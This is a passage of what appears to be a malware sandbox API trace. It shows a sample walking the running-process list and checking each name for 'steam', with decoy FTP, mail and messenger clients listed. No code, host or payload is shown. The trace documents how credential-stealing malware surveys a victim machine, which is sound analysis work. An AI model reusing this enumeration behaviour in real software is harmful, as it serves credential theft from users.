lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0099.265] StrStrIA (lpFirst="gainedshape.exe", lpSrch="steam") returned 0x0 [0099.265] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0099.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.266] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a6b8 [0099.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x357a6b8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0099.266] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0099.266] StrStrIA (lpFirst="opens-versions.exe", lpSrch="steam") returned 0x0 [0099.266] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0099.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0099.267] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b848 [0099.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356b848, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0099.267] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0099.267] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="steam") returned 0x0 [0099.267] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0099.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.269] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b958 [0099.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b958, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0099.269] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0099.269] StrStrIA (lpFirst="3dftp.exe", lpSrch="steam") returned 0x0 [0099.269] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0099.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.271] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a838 [0099.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x357a838, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0099.271] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0099.271] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="steam") returned 0x0 [0099.271] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0099.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.272] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b898 [0099.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b898, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0099.272] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0099.272] StrStrIA (lpFirst="alftp.exe", lpSrch="steam") returned 0x0 [0099.272] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0099.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.274] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b6d0 [0099.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x357b6d0, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0099.274] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0099.274] StrStrIA (lpFirst="barca.exe", lpSrch="steam") returned 0x0 [0099.274] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0099.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.275] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357b700 [0099.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x357b700, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0099.275] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0099.275] StrStrIA (lpFirst="bitkinex.exe", lpSrch="steam") returned 0x0 [0099.275] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0099.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.276] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357b970 [0099.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0099.277] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0099.277] StrStrIA (lpFirst="coreftp.exe", lpSrch="steam") returned 0x0 [0099.277] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0099.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0099.278] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574e80 [0099.278] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574e80, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0099.278] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0099.278] StrStrIA (lpFirst="far.exe", lpSrch="steam") returned 0x0 [0099.278] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0099.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.279] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357b748 [0099.279] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x357b748, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0099.279] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0099.279] StrStrIA (lpFirst="filezilla.exe", lpSrch="steam") returned 0x0 [0099.279] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0099.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.281] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357bc58 [0099.281] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x357bc58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.281] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0099.281] StrStrIA (lpFirst="flashfxp.exe", lpSrch="steam") returned 0x0 [0099.281] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0099.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.282] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357bb80 [0099.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x357bb80, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0099.282] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0099.282] StrStrIA (lpFirst="fling.exe", lpSrch="steam") returned 0x0 [0099.282] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0099.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0099.284] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x357a518 [0099.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x357a518, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0099.284] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0099.284] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="steam") returned 0x0 [0099.284] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0099.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0099.285] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x357a578 [0099.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x357a578, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0099.286] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0099.286] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="steam") returned 0x0 [0099.286] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0099.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0099.287] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574e90 [0099.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x3574e90, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0099.287] lstrcpyA (in: lpString1=0x567fabc, lpString2="icq.exe" | out: lpString1="icq.exe") returned="icq.exe" [0099.287] StrStrIA (lpFirst="icq.exe", lpSrch="steam") returned 0x0 [0099.287] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0099.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.288] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357bb50 [0099.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x357bb50, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.289] lstrcpyA (in: lpString1=0x567fabc, lpString2="leechftp.exe" | out: lpString1="leechftp.exe") returned="leechftp.exe" [0099.289] StrStrIA (lpFirst="leechftp.exe", lpSrch="steam") returned 0x0 [0099.289] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0099.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.290] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357b9e8 [0099.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x357b9e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0099.290] lstrcpyA (in: lpString1=0x567fabc, lpString2="ncftp.exe" | out: lpString1="ncftp.exe") returned="ncftp.exe" [0099.290] StrStrIA (lpFirst="ncftp.exe", lpSrch="steam") returned 0x0 [0099.290] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0099.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.291] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x357bb08 [0099.291] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x357bb08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0099.291] lstrcpyA (in: lpString1=0x567fabc, lpString2="notepad.exe" | out: lpString1="notepad.exe") returned="notepad.exe" [0099.291] StrStrIA (lpFirst="notepad.exe", lpSrch="steam") returned 0x0 [0099.292] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0099.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.293] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357ba00 [0099.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x357ba00, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0099.293] lstrcpyA (in: lpString1=0x567fabc, lpString2="operamail.exe" | out: lpString1="operamail.exe") returned="operamail.exe" [0099.293] StrStrIA (lpFirst="operamail.exe", lpSrch="steam") returned 0x0 [0099.293] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0099.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0099.294] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x357bb98 [0099.294] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x357bb98, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0099.294] lstrcpyA (in: lpString1=0x567fabc, lpString2="pidgin.exe" | out: lpString1="pidgin.exe") returned="pidgin.exe" [0099.294] StrStrIA (lpFirst="pidgin.exe", lpSrch="steam") returned 0x0 [0099.294] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0099.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.296] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x357ba60 [0099.296] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x357ba60, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0099.296] lstrcpyA (in: lpString1=0x567fabc, lpString2="scriptftp.exe" | out: lpString1="scriptftp.exe") returned="scriptftp.exe" [0099.296] StrStrIA (lpFirst="scriptftp.exe", lpSrch="steam") returned 0x0 [0099.296] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0099.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0099.297] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x357ba90 [0099.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x357ba90, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0099.297] lstrcpyA (in: lpString1=0x567fabc, lpString2="skype.exe" | out: lpString1="skype.exe") returned="skype.exe" [0099.297] StrStrIA (lpFirst="skype.exe", lpSrch="steam") returned 0x0 [0099.297] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0099.298] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.298] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x357bb20 [0099.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x357bb20, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0099.299] lstrcpyA (in: lpString1=0x567fabc, lpString2="smartftp.exe" | out: lpString1="smartftp.exe") returned="smartftp.exe" 